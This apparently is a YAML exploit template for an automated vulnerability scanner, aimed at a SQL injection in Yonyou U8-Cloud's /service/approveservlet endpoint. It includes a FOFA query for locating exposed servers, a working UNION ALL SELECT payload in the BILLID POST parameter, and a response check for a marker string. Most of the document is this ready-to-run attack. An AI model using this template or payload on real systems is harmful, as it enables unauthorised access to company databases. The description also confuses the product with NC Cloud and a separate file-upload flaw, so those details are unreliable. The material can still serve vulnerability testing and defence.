product: 用友U8-Cloud
vName: 用友U8-Cloud service_approveservlet接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: NC Cloud是用友推出的大型企业数字化平台。 用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞，攻击者可利用该漏洞获取服务器控制权。用友-U8-Cloud service/approveservlet接口存在SQL注入漏洞。
version: ''
note: ''
search:
  FOFA: body="/api/uclient/public/"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247487750&idx=1&sn=fe3f4129970c2a296fce00901f6135f0&chksm=974b9c01a03c151788f57f9151170918d779defafc4d4c1e817c6857ffcc6462767cc3ca4a8c&scene=178&cur_album_id=2873032428486115330#rd
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /service/approveservlet
      data: BILLID=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,`b0bef10a.`,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&BILLTYPE=4331&USERID=3&RESULT=4&DATASOURCE=U8cloud
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - b0bef10a.
            logic: 'and'